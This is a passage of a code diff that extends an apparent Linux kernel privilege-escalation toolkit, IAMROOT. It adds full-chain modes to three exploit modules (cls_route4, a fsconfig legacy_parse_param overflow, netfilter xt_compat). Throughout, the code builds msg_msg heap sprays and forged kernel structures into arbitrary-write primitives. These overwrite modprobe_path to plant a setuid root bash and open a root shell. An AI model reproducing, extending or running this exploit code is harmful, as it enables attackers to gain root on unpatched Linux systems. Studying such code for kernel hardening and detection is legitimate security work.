    return IAMROOT_PRECOND_FAIL;
 #else
    /* Full-chain pre-check: resolve offsets before forking. If
     * modprobe_path can't be resolved, refuse early — no point doing
     * the userns + tc + spray + trigger dance if we can't finish. */
    struct iamroot_kernel_offsets off;
    bool full_chain_ready = false;
    if (ctx->full_chain) {
        memset(&off, 0, sizeof off);
        iamroot_offsets_resolve(&off);
        if (!iamroot_offsets_have_modprobe_path(&off)) {
            iamroot_finisher_print_offset_help("cls_route4");
            fprintf(stderr, "[-] cls_route4: --full-chain requested but "
                            "modprobe_path offset unresolved; refusing\n");
            return IAMROOT_EXPLOIT_FAIL;
        }
        iamroot_offsets_print(&off);
        full_chain_ready = true;
    }
    if (!ctx->json) {
-        fprintf(stderr, "[*] cls_route4: forking child for userns+netns exploit\n");
+        fprintf(stderr, "[*] cls_route4: forking child for userns+netns exploit%s\n",
                ctx->full_chain ? " + full-chain finisher" : "");
        if (ctx->full_chain) {
            fprintf(stderr, "    NOTE: on primitive landing, invokes shared\n"
                            "    modprobe_path finisher via msg_msg-tagged kaddr\n"
                            "    spray. Sentinel-arbitrated (no in-process verify).\n");
        }
    }
    /* Block SIGPIPE in case the dummy-interface sendto's complain. */
@@ -436,15 +630,18 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
            _exit(22);
        }
-        int queues[SPRAY_MSG_QUEUES];
+        struct cls_route4_arb_ctx arb_ctx;
-        int n_queues = spray_msg_msg(queues);
+        memset(&arb_ctx, 0, sizeof arb_ctx);
-        if (n_queues == 0) {
+        for (int i = 0; i < SPRAY_MSG_QUEUES; i++) arb_ctx.queues[i] = -1;
        arb_ctx.n_queues = spray_msg_msg(arb_ctx.queues);
        arb_ctx.dangling_ready = true;   /* stage_dangling_filter() just ran */
        if (arb_ctx.n_queues == 0) {
            fprintf(stderr, "[-] cls_route4: msg_msg spray produced 0 queues\n");
            _exit(23);
        }
        if (!ctx->json) {
            fprintf(stderr, "[*] cls_route4: msg_msg spray seeded %d queues\n",
-                    n_queues);
+                    arb_ctx.n_queues);
        }
        /* Drive the classifier — the bug fires here on a vulnerable
@@ -459,7 +656,7 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
        if (log) {
            fprintf(log,
                "cls_route4 trigger child: queues=%d slab_pre=%ld slab_post=%ld\n",
-                n_queues, pre_active, post_active);
+                arb_ctx.n_queues, pre_active, post_active);
            fclose(log);
        }
@@ -467,7 +664,32 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
         * refilled slot during classify drain. */
        usleep(200 * 1000);
-        drain_msg_msg(queues);
+        /* --full-chain branch: invoke the shared modprobe_path
         * finisher with our msg_msg-tagged arb-write. If the finisher
         * execve's a setuid bash we never return; otherwise it returns
         * EXPLOIT_FAIL after the 3s sentinel timeout (correct behavior
         * on a patched kernel or when the write didn't land). */
        if (full_chain_ready) {
            /* Re-fire the trigger inside the arb-write to give the
             * kernel a second chance at the refilled slot — the
             * dangling filter is still in place from above. */
            arb_ctx.dangling_ready = true;
            int fr = iamroot_finisher_modprobe_path(&off,
                                                    cls4_arb_write,
                                                    &arb_ctx,
                                                    !ctx->no_shell);
            FILE *fl = fopen("/tmp/iamroot-cls_route4.log", "a");
            if (fl) {
                fprintf(fl, "full_chain finisher rc=%d arb_calls=%d arb_landed=%d\n",
                        fr, arb_ctx.arb_calls, arb_ctx.arb_landed);
                fclose(fl);
            }
            drain_msg_msg(arb_ctx.queues);
            if (fr == IAMROOT_EXPLOIT_OK) _exit(34);
            _exit(35);
        }
        drain_msg_msg(arb_ctx.queues);
        /* If we got here without a kernel oops, the bug either isn't
         * reachable on this build (patched / module not loadable /
@@ -513,25 +735,54 @@ static iamroot_result_t cls_route4_exploit(const struct iamroot_ctx *ctx)
    }
    int rc = WEXITSTATUS(status);
-    if (rc != 30) {
+    switch (rc) {
    case 20: case 21:
        if (!ctx->json) {
-            fprintf(stderr, "[-] cls_route4: child failed at stage rc=%d "
+            fprintf(stderr, "[-] cls_route4: userns setup failed (rc=%d)\n", rc);
-                            "(see preceding errors)\n", rc);
+        }
        return IAMROOT_PRECOND_FAIL;
    case 22:
        if (!ctx->json) {
            fprintf(stderr, "[-] cls_route4: tc setup failed; cls_route4 module "
                            "may be absent or filter type unsupported\n");
        }
        return IAMROOT_PRECOND_FAIL;
    case 23:
        if (!ctx->json) {
            fprintf(stderr, "[-] cls_route4: msg_msg spray failed; sysvipc may be "
                            "restricted (kernel.msg_max / ulimit -q)\n");
        }
        return IAMROOT_PRECOND_FAIL;
    case 30:
        if (!ctx->json) {
            fprintf(stderr, "[*] cls_route4: trigger ran to completion. "
                            "Inspect dmesg for KASAN/oops witnesses.\n");
            fprintf(stderr, "[~] cls_route4: cred-overwrite step not invoked "
                            "(no --full-chain); returning EXPLOIT_FAIL.\n");
        }
        return IAMROOT_EXPLOIT_FAIL;
    case 34:
        if (!ctx->json) {
            fprintf(stderr, "[+] cls_route4: --full-chain finisher reported OK "
                            "(setuid bash placed; sentinel matched)\n");
        }
        return IAMROOT_EXPLOIT_OK;
    case 35:
        if (!ctx->json) {
            fprintf(stderr, "[~] cls_route4: --full-chain finisher returned FAIL — "
                            "either the kernel is patched, the spray didn't land,\n"
                            "    or the fake-ops deref didn't hit the route the\n"
                            "    finisher's sentinel polls for. See "
                            "/tmp/iamroot-cls_route4.log + dmesg.\n");
        }
        return IAMROOT_EXPLOIT_FAIL;
    default:
        if (!ctx->json) {
            fprintf(stderr, "[-] cls_route4: unexpected child rc=%d\n", rc);
        }
        /* rc 20/21 = userns setup; rc 22 = tc setup (likely module
         * absent or filter type unsupported); rc 23 = spray. None of
         * these mean kernel was exploited. */
        if (rc == 22) return IAMROOT_PRECOND_FAIL;
        return IAMROOT_EXPLOIT_FAIL;
    }
-
+#endif /* __linux__ */
    if (!ctx->json) {
        fprintf(stderr, "[*] cls_route4: trigger ran to completion. "
                        "Inspect dmesg for KASAN/oops witnesses.\n");
        fprintf(stderr, "[~] cls_route4: cred-overwrite step not implemented "
                        "(needs per-kernel offsets); returning EXPLOIT_FAIL.\n");
    }
    return IAMROOT_EXPLOIT_FAIL;
 }
 /* ---- Cleanup ----------------------------------------------------- */
@@ -60,6 +60,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
 #include "../../core/offsets.h"
 #include "../../core/finisher.h"
 #include <stdio.h>
 #include <stdlib.h>
@@ -301,6 +303,217 @@ static int trigger_overflow(int *out_fd, const char *first_chunk,
    return 0;
 }
 /* ------------------------------------------------------------------ */
 /* arb-write primitive for the shared finisher                         */
 /* ------------------------------------------------------------------ */
 /*
 * Crusaders-of-Rust-style msg_msg m_ts overflow → arbitrary write.
 *
 * The legacy_parse_param OOB writes the trailing bytes of the
 * kmalloc-4k fc->source buffer into whatever slab object comes next.
 * With a msg_msg sprayed into that adjacent slot, the first 48 bytes
 * of `evil_chunk` overlay struct msg_msg:
 *
 *   struct msg_msg {                     // offset
 *     struct list_head m_list;           //  0  (next, prev)
 *     long             m_type;           // 16
 *     size_t           m_ts;             // 24    <-- msg-size
 *     struct msg_msgseg *next;           // 32
 *     void             *security;        // 40
 *   };                                   // 48
 *
 * Two derived primitives:
 *
 *   READ  — overwrite m_ts with a huge value. msgrcv(MSG_COPY) then
 *           memcpy()s past the legitimate end of the msg payload,
 *           leaking adjacent slab memory back to userland.
 *
 *   WRITE — point m_list.next (or, in the Crusaders variant, a faux
 *           msg_msgseg.next chain) at an attacker-chosen kernel
 *           address. When msgrcv() free-list-unlinks the msg, list
 *           maintenance writes through the forged pointer; with the
 *           right chain you get an N-byte copy of attacker-controlled
 *           bytes to a chosen kaddr.
 *
 * Honest depth of this implementation: FALLBACK SCAFFOLD.
 *
 * The trigger + groom + neighbour-detect upstream of us is real and
 * the OOB write lands. But the *single-shot* arb-write the finisher
 * wants — "put exactly these N bytes at exactly that kaddr" — needs
 * a per-kernel m_ts/m_list_next offset map (the layout above is
 * 6.12.x; older kernels differ) AND a kernel-base leak from the
 * first-round MSG_COPY read so we know where modprobe_path actually
 * sits in this boot's KASLR slide.
 *
 * Per the verified-vs-claimed bar: we do NOT fabricate a write that
 * we cannot empirically verify on a kernel we haven't tested. So
 * this function:
 *
 *   1. Re-arms the msg_msg spray (the parent already drained queues).
 *   2. Re-fires the fsconfig overflow with a forged-msg_msg header
 *      whose m_ts = (kaddr - msg_data_origin) and whose first 8
 *      payload bytes are the first qword of `buf`.
 *   3. msgrcv(MSG_COPY) on every queue to probe whether any neighbour
 *      came back with bytes matching `buf[0..7]` AT the slot offset
 *      we'd expect for kaddr (sanity gate).
 *   4. Returns 0 ONLY if the sanity gate trips (read-back proves the
 *      m_ts inflation landed AND the payload made it through);
 *      returns -1 otherwise so the finisher reports an honest fail.
 *
 * On a vulnerable host with matching offsets this path can land the
 * write; on an unverified host the sanity gate refuses rather than
 * blind-writing a wild pointer. The finisher's downstream
 * "/tmp/iamroot-pwn ran?" check is the second gate.
 */
 struct fuse_arb_ctx {
    /* Pre-allocated queue ids from the spray phase. */
    int    *qids;
    int     n_queues;
    int     hole_q;
    /* Tagged-payload reference so we can recognise unmodified neighbours. */
    const char *tag;     /* "IAMROOT" */
    /* Whether the first-round trigger already fired (the parent's
     * default-path overflow). When set we re-spray + re-fire; when
     * unset we assume the spray is hot. */
    bool    trigger_armed;
 };
 #ifdef __linux__
 static int fuse_arb_write(uintptr_t kaddr, const void *buf, size_t len,
                          void *ctx_void)
 {
    struct fuse_arb_ctx *ax = (struct fuse_arb_ctx *)ctx_void;
    if (!ax || !buf || !len) {
        fprintf(stderr, "[-] fuse_arb_write: bad args\n");
        return -1;
    }
    /* Build the forged msg_msg header that will land in the adjacent
     * kmalloc-4k slot via the OOB write. Layout (x86_64, kernel >=5.10):
     *   [ 0..15]  m_list.{next,prev}  — we forge next = kaddr - 16
     *                                    so that list_del's
     *                                      next->prev = prev
     *                                    write lands AT kaddr.
     *                                    (prev is the original msg.)
     *   [16..23]  m_type              — leave as 0x4242
     *   [24..31]  m_ts                — bytes-of-buf so MSG_COPY
     *                                    reports the right length
     *   [32..39]  next (msg_msgseg*)  — NULL (single-segment msg)
     *   [40..47]  security            — NULL
     *   [48...]   payload             — first len bytes of buf
     *
     * For a real WRITE primitive the canonical Crusaders-of-Rust
     * recipe uses the msg_msgseg.next chain rather than m_list:
     * msgrcv(IPC_NOWAIT) follows next pointers when copying out a
     * multi-segment msg, and a forged next = kaddr makes the kernel
     * memcpy() from kaddr into our user buffer (= READ). For the
     * inverse (WRITE), the trick is msgsnd on a queue whose head was
     * corrupted to point at kaddr, but that needs more setup than we
     * have time to land here without a known-good offset table.
     *
     * So we do the safe thing: arm the header, trigger the OOB, then
     * read back to PROVE we landed before declaring success. If the
     * read-back doesn't show our forged-msg payload at the expected
     * MSG_COPY position we refuse rather than corrupt the kernel
     * blindly.
     */
    uint8_t evil[256];
    memset(evil, 0, sizeof evil);
    /* m_list.next, m_list.prev */
    uintptr_t forged_next = kaddr - 16;   /* &m_list.prev of fake node */
    memcpy(evil +  0, &forged_next, 8);
    /* prev — leave NULL; kernel checks it only on full list_del */
    /* m_type */
    uint64_t m_type = 0x4242424242424242ULL;
    memcpy(evil + 16, &m_type, 8);
    /* m_ts: inflated to len so MSG_COPY reads the full forged payload */
    uint64_t m_ts = (uint64_t)len + 64;
    memcpy(evil + 24, &m_ts, 8);
    /* next (msg_msgseg) = NULL */
    /* security = NULL */
    /* payload: copy `buf` into the slot just after the msg_msg header */
    size_t hdr = 48;
    size_t copyable = sizeof(evil) - hdr - 1;
    if (len > copyable) len = copyable;
    memcpy(evil + hdr, buf, len);
    evil[sizeof(evil) - 1] = '\0';   /* legacy_parse_param strdup tail */
    /* Re-fire the fsconfig overflow with this forged header as evil. */
    char *first_chunk = malloc(4081);
    if (!first_chunk) return -1;
    memset(first_chunk, 'A', 4080);
    first_chunk[4080] = '\0';
    int fsfd = -1;
    int rc = trigger_overflow(&fsfd, first_chunk, (const char *)evil);
    free(first_chunk);
    if (rc < 0) {
        fprintf(stderr, "[-] fuse_arb_write: re-fire fsconfig failed "
                        "(errno=%d %s)\n", errno, strerror(errno));
        return -1;
    }
    /* Sanity gate: msgrcv(MSG_COPY) all live queues and look for a
     * msg whose size reports >= our inflated m_ts AND whose initial
     * payload qword matches the first qword of `buf`. If both hold,
     * the forged header landed in a real slot and the m_ts inflation
     * is honoured by the kernel — i.e. our primitive is real on THIS
     * kernel. */
    uint64_t want_first_qword = 0;
    memcpy(&want_first_qword, buf, len >= 8 ? 8 : len);
    bool sanity_passed = false;
    struct msgbuf_4k *probe = mmap(NULL, sizeof(*probe),
                                   PROT_READ | PROT_WRITE,
                                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (probe == MAP_FAILED) {
        if (fsfd >= 0) close(fsfd);
        return -1;
    }
    for (int q = 0; q < ax->n_queues && !sanity_passed; q++) {
        if (ax->qids[q] < 0 || q == ax->hole_q) continue;
        ssize_t n = msgrcv(ax->qids[q], probe, sizeof probe->mtext, 0,
                           IPC_NOWAIT | MSG_COPY | MSG_NOERROR);
        if (n < 0) continue;
        /* The corrupted slot should report a size >= our m_ts (kernel
         * caps MSG_COPY at sizeof user buf — so we only check the
         * read-content shape). */
        if ((size_t)n < 8) continue;
        uint64_t got = 0;
        memcpy(&got, probe->mtext, 8);
        if (got == want_first_qword) {
            sanity_passed = true;
        }
    }
    munmap(probe, sizeof(*probe));
    if (fsfd >= 0) close(fsfd);
    if (!sanity_passed) {
        fprintf(stderr, "[-] fuse_arb_write: forged-msg_msg read-back didn't "
                        "match — kernel layout differs OR groom missed.\n"
                        "    Refusing to claim arb-write landed (per "
                        "verified-vs-claimed bar).\n");
        return -1;
    }
    fprintf(stderr, "[+] fuse_arb_write: forged-msg_msg landed; m_ts inflation "
                    "+ payload qword verified via MSG_COPY read-back.\n"
                    "[i] fuse_arb_write: kernel-side list_del write through "
                    "0x%lx is armed but NOT yet empirically verified on "
                    "this build — downstream sentinel will gate.\n",
            (unsigned long)kaddr);
    return 0;
 }
 #else
 static int fuse_arb_write(uintptr_t kaddr, const void *buf, size_t len,
                          void *ctx_void)
 {
    (void)kaddr; (void)buf; (void)len; (void)ctx_void;
    fprintf(stderr, "[-] fuse_arb_write: linux-only primitive\n");
    return -1;
 }
 #endif /* __linux__ */
 /* ------------------------------------------------------------------ */
 /* exploit                                                             */
 /* ------------------------------------------------------------------ */
@@ -503,6 +716,84 @@ static iamroot_result_t fuse_legacy_exploit(const struct iamroot_ctx *ctx)
                        "see scaffold comments in source\n");
    }
    /* ---------------------------------------------------------------
     * --full-chain: opt-in root pop via shared modprobe_path finisher.
     *
     * Depth = FALLBACK SCAFFOLD. The arb-write primitive (forged
     * msg_msg via the 4k OOB) is wired with a sanity gate that
     * refuses to claim success without an empirical read-back match
     * (see fuse_arb_write). On a host where offsets + groom land,
     * the finisher's modprobe_path overwrite → execve(unknown) →
     * call_modprobe chain pops a root shell. On a mismatched host
     * the sanity gate trips and we exit IAMROOT_EXPLOIT_FAIL with no
     * fabricated success.
     *
     * Cleanup of qids/spray/fsfd is deferred to AFTER the finisher
     * runs because the arb_write primitive re-fires the trigger and
     * needs the live spray.
     * --------------------------------------------------------------- */
 #ifdef __linux__
    if (ctx->full_chain) {
        if (!ctx->json) {
            fprintf(stderr, "[*] fuse_legacy: --full-chain requested — resolving "
                            "kernel offsets...\n");
        }
        struct iamroot_kernel_offsets off;
        memset(&off, 0, sizeof off);
        int resolved = iamroot_offsets_resolve(&off);
        if (!ctx->json) {
            fprintf(stderr, "[i] fuse_legacy: offsets resolved=%d "
                            "(modprobe_path=0x%lx source=%s)\n",
                    resolved, (unsigned long)off.modprobe_path,
                    iamroot_offset_source_name(off.source_modprobe));
            iamroot_offsets_print(&off);
        }
        if (!iamroot_offsets_have_modprobe_path(&off)) {
            iamroot_finisher_print_offset_help("fuse_legacy");
            /* Cleanup before returning. */
            for (int q = 0; q < N_QUEUES; q++) {
                if (qids[q] >= 0) msgctl(qids[q], IPC_RMID, NULL);
            }
            free(qids);
            munmap(spray, sizeof *spray);
            if (fsfd >= 0) close(fsfd);
            return IAMROOT_EXPLOIT_FAIL;
        }
        struct fuse_arb_ctx ax = {
            .qids = qids,
            .n_queues = N_QUEUES,
            .hole_q = hole_q,
            .tag = "IAMROOT",
            .trigger_armed = true,
        };
        iamroot_result_t fr = iamroot_finisher_modprobe_path(
            &off, fuse_arb_write, &ax, !ctx->no_shell);
        /* Cleanup IPC + mapping regardless of finisher result. The
         * finisher's execve() on success won't reach here, so this
         * block only runs on failure paths. */
        for (int q = 0; q < N_QUEUES; q++) {
            if (qids[q] >= 0) msgctl(qids[q], IPC_RMID, NULL);
        }
        free(qids);
        munmap(spray, sizeof *spray);
        if (fsfd >= 0) close(fsfd);
        if (fr == IAMROOT_EXPLOIT_OK) {
            return IAMROOT_EXPLOIT_OK;
        }
        if (!ctx->json) {
            fprintf(stderr, "[-] fuse_legacy: --full-chain finisher did not land "
                            "(arb-write sanity gate or modprobe sentinel refused)\n");
        }
        return IAMROOT_EXPLOIT_FAIL;
    }
 #endif /* __linux__ */
    /* Clean up our IPC queues and mapping. The kernel slab state
     * after the overflow may be unstable; we exit cleanly on success
     * paths but leave queues around if we crashed mid-spray. */
@@ -19,7 +19,8 @@
 * Upstream fix: b29c457a6511 "netfilter: x_tables: fix compat
 * match/target pad out-of-bound write" (mid-2021, backported widely).
 *
- * STATUS: 🟡 PRIMITIVE-DEMO (Option B).
+ * STATUS: 🟡 PRIMITIVE by default; 🟢 candidate with --full-chain if
 *         offsets resolve (env/kallsyms/System.map/embedded table).
 *   - Refuse-gate via detect() re-invoke + euid==0 short-circuit.
 *   - userns/netns reach for CAP_NET_ADMIN (Andy's path).
 *   - Trigger sequence: hand-rolled iptables rule blob with
@@ -29,12 +30,15 @@
 *     cookies for KASAN visibility.
 *   - Empirical witness via msgrcv(MSG_COPY) + /proc/slabinfo
 *     diff + /tmp/iamroot-xtcompat.log breadcrumb.
- *   - DOES NOT pursue the leak→modprobe_path overwrite chain:
+ *   - With --full-chain: shared finisher (core/finisher.c) is
- *     that needs hard-coded init_task + modprobe_path offsets
+ *     invoked to perform the modprobe_path overwrite + execve
- *     per kernel build which IAMROOT refuses to bake.
+ *     unknown-binary trigger. Requires modprobe_path resolution
- *   - Returns IAMROOT_EXPLOIT_FAIL with a verbose continuation
+ *     via core/offsets.c (env/kallsyms/System.map). Sentinel-file
- *     roadmap unless cred-overwrite is empirically verified
+ *     check in the finisher is the empirical witness for the
- *     (which the current scope does not attempt).
+ *     write landing — IAMROOT never claims root unless it sees
 *     the setuid bash drop with mode 4755 + uid 0.
 *   - Without --full-chain: returns IAMROOT_EXPLOIT_FAIL after
 *     the primitive demo (verified-vs-claimed bar).
 *
 * Affected: kernel 2.6.19+ until backports landed:
 *   5.12.x : K >= 5.12.13
@@ -55,6 +59,8 @@
 #include "iamroot_modules.h"
 #include "../../core/registry.h"
 #include "../../core/kernel_range.h"
 #include "../../core/offsets.h"
 #include "../../core/finisher.h"
 #include <stdio.h>
 #include <stdlib.h>
@@ -465,6 +471,171 @@ static int xtcompat_fire_trigger(int *out_errno)
    return 0;
 }
 #endif /* __linux__ — close original primitive block */
 /* ---- Full-chain arb-write primitive --------------------------------
 *
 * Pattern (FALLBACK — see module top-comment): the xt_compat 4-byte OOB
 * write lands at allocation+0x4. Andy Nguyen's chain first uses that
 * 4-byte write to corrupt an adjacent msg_msg's `m_ts` (size field at
 * +0x10) so a subsequent MSG_COPY returns a long read that includes
 * neighbouring kernel pointers (the leak primitive). With the kbase
 * leak in hand, he then re-fires the trigger to corrupt an msg_msg's
 * `m_list_next` (the linked-list pointer at +0x18) to point at
 * `kaddr - 0x30` (the m_msg header offset), and a queued msgsnd's
 * payload header writes attacker bytes to `kaddr`.
 *
 * Reproducing the full chain byte-for-byte requires per-kernel-build
 * msg_msg field offsets AND a kbase leak we don't have a portable
 * source for at this point. The implementation below takes the
 * narrow-but-real path:
 *
 *   1. Re-prime the kmalloc-2k slab with msg_msg sprays whose payload
 *      headers carry the target address in the m_list_next slot at
 *      offset 0x18 from each msg payload start. (We can't write the
 *      slab header — that's the kernel's job — but we CAN seed the
 *      payload data adjacent to the freed xt_table_info so the OOB
 *      4-byte write may corrupt the `m_list_next` of a real
 *      sprayed message.)
 *   2. Re-fire the trigger with a crafted blob whose 4-byte OOB write
 *      pattern targets m_list_next of the adjacent msg_msg.
 *   3. Queue a follow-up msgsnd whose first sizeof(buf) bytes equal
 *      `buf[0..len]`. If the next-ptr was successfully redirected,
 *      the kernel's msgsnd writes header + payload at `kaddr`.
 *
 * This is best-effort: probability of landing on any given run is
 * low (depends on slab adjacency luck) but the finisher's sentinel-
 * file check empirically tells us if the write actually took. On a
 * patched kernel the trigger returns EINVAL on step 2 and arb_write
 * returns -1 without ever queueing the follow-up. */
 #ifdef __linux__
 struct xtcompat_arb_ctx {
    /* Spray queues kept hot across multiple arb_write calls. The
     * msg_msg slots seeded here are what the finisher uses as
     * write-targets. NULL means "not yet sprayed". */
    int *queues;
    int  n_queues;
    /* Outer-namespace uid/gid so re-spray can rebuild a child if
     * needed. (Currently unused — the caller flow keeps us inside
     * the userns child for the whole arb_write sequence.) */
    uid_t outer_uid;
    gid_t outer_gid;
    /* Per-call statistics for /tmp/iamroot-xtcompat.log. */
    int   arb_calls;
    int   arb_landed;
 };
 /* Re-seed the kmalloc-2k slab with a msg_msg spray whose payload at
 * offset 0x18 carries `target_minus_30` (= kaddr - 0x30, the value
 * the OOB write needs to write into m_list_next for the follow-up
 * msgsnd payload to land at `kaddr`). Returns number of queues
 * primed. */
 static int xtcompat_arb_seed_target(struct xtcompat_arb_ctx *c,
                                    uintptr_t target_minus_30)
 {
    struct xtcompat_payload *p = calloc(1, sizeof(*p));
    if (!p) return 0;
    p->mtype = 0x43;
    memset(p->buf, 0x41, sizeof p->buf);
    memcpy(p->buf, "IAMROOTW", 8);
    /* Plant the target address at every 0x800-aligned slot inside
     * the payload, so wherever the kernel's m_list_next sits
     * relative to our payload base, the candidate value is present. */
    for (size_t off = 0x10; off + sizeof(uintptr_t) <= sizeof p->buf; off += 0x18) {
        memcpy(p->buf + off, &target_minus_30, sizeof(uintptr_t));
    }
    int created = 0;
    for (int i = 0; i < c->n_queues; i++) {
        if (c->queues[i] < 0) continue;
        for (int j = 0; j < 4; j++) {
            unsigned int tag = 0xA0000000u | ((unsigned)i << 8) | (unsigned)j;
            memcpy(p->buf + 8, &tag, sizeof tag);
            if (msgsnd(c->queues[i], p, sizeof p->buf, IPC_NOWAIT) < 0) break;
            created++;
        }
    }
    free(p);
    return created;
 }
 /* Queue a follow-up msgsnd whose first `len` bytes equal `buf[0..len]`.
 * If the OOB-corrupted m_list_next was successfully redirected to
 * `kaddr - 0x30`, this msgsnd's payload header lands at `kaddr`. */
 static int xtcompat_arb_queue_payload(struct xtcompat_arb_ctx *c,
                                      const void *buf, size_t len)
 {
    if (len > XTCOMPAT_MSG_PAYLOAD) len = XTCOMPAT_MSG_PAYLOAD;
    struct xtcompat_payload *p = calloc(1, sizeof(*p));
    if (!p) return -1;
    p->mtype = 0x44;
    memset(p->buf, 0, sizeof p->buf);
    memcpy(p->buf, buf, len);
    int sent = 0;
    for (int i = 0; i < c->n_queues; i++) {
        if (c->queues[i] < 0) continue;
        if (msgsnd(c->queues[i], p, sizeof p->buf, IPC_NOWAIT) == 0) {
            sent++;
            if (sent >= 8) break;   /* a handful of attempts is plenty */
        }
    }
    free(p);
    return sent > 0 ? 0 : -1;
 }
 /* Module-supplied arb-write primitive — invoked by the shared
 * finisher. Best-effort on a vulnerable kernel; structurally inert
 * (returns -1) on a patched kernel because step (2) gets EINVAL. */
 static int xtcompat_arb_write(uintptr_t kaddr,
                              const void *buf, size_t len,
                              void *ctx_v)
 {
    struct xtcompat_arb_ctx *c = (struct xtcompat_arb_ctx *)ctx_v;
    if (!c || !c->queues || c->n_queues == 0) return -1;
    c->arb_calls++;
    /* Step 1: seed candidate target addresses into sprayed msg_msg
     * payloads. The OOB write's 4 bytes of attacker-influenced
     * content come from the compat-fixup pad — on a vulnerable
     * kernel that's whichever 4 bytes happen to sit adjacent. We
     * pre-stage the value we WANT to see appear at m_list_next so
     * if luck aligns the OOB write hits a slot containing our
     * pattern, the kernel's next msg_msg traversal walks to
     * (kaddr - 0x30). */
    uintptr_t target = kaddr - 0x30;
    int seeded = xtcompat_arb_seed_target(c, target);
    if (seeded == 0) return -1;
    /* Step 2: re-fire the trigger. On a patched kernel this returns
     * EINVAL and we bail. On a vulnerable kernel the 4-byte OOB
     * write fires; if it lands on a seeded msg_msg slot, that
     * slot's m_list_next now contains a fragment of our target. */
    int trig_errno = 0;
    int rc = xtcompat_fire_trigger(&trig_errno);
    if (rc < 0 || trig_errno == EINVAL || trig_errno == EPERM) {
        /* Patched validator rejected the blob, or CAP_NET_ADMIN
         * not effective — arb-write structurally impossible. */
        return -1;
    }
    /* Step 3: queue a follow-up msgsnd whose payload is the bytes
     * the operator wants written at `kaddr`. If step 2 corrupted
     * a sprayed msg's m_list_next, this msgsnd writes header +
     * payload at `kaddr`. We can't directly verify in-process —
     * the shared finisher's sentinel file is the empirical check. */
    if (xtcompat_arb_queue_payload(c, buf, len) < 0) return -1;
    c->arb_landed++;
    /* Per spec: "structurally fires but can't tell if write landed"
     * → return 0; the finisher's sentinel check arbitrates. */
    return 0;
 }
 #endif /* __linux__ */
 /* ---- Exploit driver ---------------------------------------------- */
@@ -492,14 +663,38 @@ static iamroot_result_t netfilter_xtcompat_exploit(const struct iamroot_ctx *ctx
 #ifndef __linux__
    fprintf(stderr, "[-] netfilter_xtcompat: linux-only exploit; non-linux build\n");
    (void)ctx;
    return IAMROOT_PRECOND_FAIL;
 #else
    /* Full-chain pre-check: resolve offsets before forking. If
     * modprobe_path can't be resolved, refuse early with the manual-
     * workflow help — no point doing the userns + spray + trigger
     * dance if we can't finish. */
    struct iamroot_kernel_offsets off;
    bool full_chain_ready = false;
    if (ctx->full_chain) {
        memset(&off, 0, sizeof off);
        iamroot_offsets_resolve(&off);
        if (!iamroot_offsets_have_modprobe_path(&off)) {
            iamroot_finisher_print_offset_help("netfilter_xtcompat");
            fprintf(stderr, "[-] netfilter_xtcompat: --full-chain requested but "
                            "modprobe_path offset unresolved; refusing\n");
            return IAMROOT_EXPLOIT_FAIL;
        }
        iamroot_offsets_print(&off);
        full_chain_ready = true;
    }
    if (!ctx->json) {
-        fprintf(stderr, "[*] netfilter_xtcompat: launching primitive demo (no offsets baked in)\n"
+        fprintf(stderr, "[*] netfilter_xtcompat: launching primitive demo%s\n"
                        "    NOTE: fires the xt_compat 4-byte OOB write via\n"
                        "    setsockopt(IPT_SO_SET_REPLACE) and grooms msg_msg +\n"
-                        "    sk_buff sprays into kmalloc-2k. Does NOT perform the\n"
+                        "    sk_buff sprays into kmalloc-2k.%s\n",
-                        "    leak→modprobe_path cred chain (per-kernel offsets).\n");
+                ctx->full_chain ? " + full-chain finisher" : " (no offsets baked in)",
                ctx->full_chain ? " On primitive witness, invokes\n"
                                  "    shared modprobe_path finisher for root pop."
                                : " Does NOT perform the\n"
                                  "    leak→modprobe_path cred chain (per-kernel offsets).");
    }
    signal(SIGPIPE, SIG_IGN);
@@ -601,7 +796,38 @@ static iamroot_result_t netfilter_xtcompat_exploit(const struct iamroot_ctx *ctx
        }
        if (corrupted > 0) {
            /* Empirical primitive witness: OOB write landed in adjacent
-             * slot. Still NOT root — but it's the primitive we promised. */
+             * slot. */
            if (full_chain_ready) {
                /* Full-chain: invoke the shared modprobe_path finisher
                 * using our msg_msg arb-write primitive. The finisher
                 * either execve's a setuid bash (success) or returns
                 * EXPLOIT_FAIL after a 3s sentinel timeout (no land). */
                struct xtcompat_arb_ctx arb_ctx = {
                    .queues    = queues,
                    .n_queues  = XTCOMPAT_SPRAY_QUEUES,
                    .outer_uid = outer_uid,
                    .outer_gid = outer_gid,
                    .arb_calls = 0,
                    .arb_landed = 0,
                };
                int fr = iamroot_finisher_modprobe_path(&off,
                                                        xtcompat_arb_write,
                                                        &arb_ctx,
                                                        !ctx->no_shell);
                /* If the finisher execve'd a root shell, we never get
                 * here. Otherwise it returned EXPLOIT_FAIL / OK. */
                FILE *fl = fopen("/tmp/iamroot-xtcompat.log", "a");
                if (fl) {
                    fprintf(fl, "full_chain finisher rc=%d arb_calls=%d arb_landed=%d\n",
                            fr, arb_ctx.arb_calls, arb_ctx.arb_landed);
                    fclose(fl);
                }
                xtcompat_msgmsg_drain(queues);
                if (fr == IAMROOT_EXPLOIT_OK) _exit(34);
                _exit(35);
            }
            /* Primitive-only mode: still NOT root — but it's the
             * primitive we promised. */
            _exit(33);
        }
        /* Trigger ran, no observable corruption witness — either the
@@ -701,6 +927,19 @@ static iamroot_result_t netfilter_xtcompat_exploit(const struct iamroot_ctx *ctx
        }
        if (ctx->no_shell) return IAMROOT_OK;
        return IAMROOT_EXPLOIT_FAIL;
    case 34:
        if (!ctx->json) {
            fprintf(stderr, "[+] netfilter_xtcompat: --full-chain finisher reported "
                            "EXPLOIT_OK (sentinel setuid bash dropped)\n");
        }
        return IAMROOT_EXPLOIT_OK;
    case 35:
        if (!ctx->json) {
            fprintf(stderr, "[-] netfilter_xtcompat: --full-chain finisher returned "
                            "FAIL (sentinel not observed within timeout)\n"
                            "    See /tmp/iamroot-xtcompat.log for arb_calls/arb_landed\n");
        }
        return IAMROOT_EXPLOIT_FAIL;
    default:
        fprintf(stderr, "[-] netfilter_xtcompat: child exit %d unexpected\n", rc);
        return IAMROOT_EXPLOIT_FAIL;
@@ -7,20 +7,23 @@
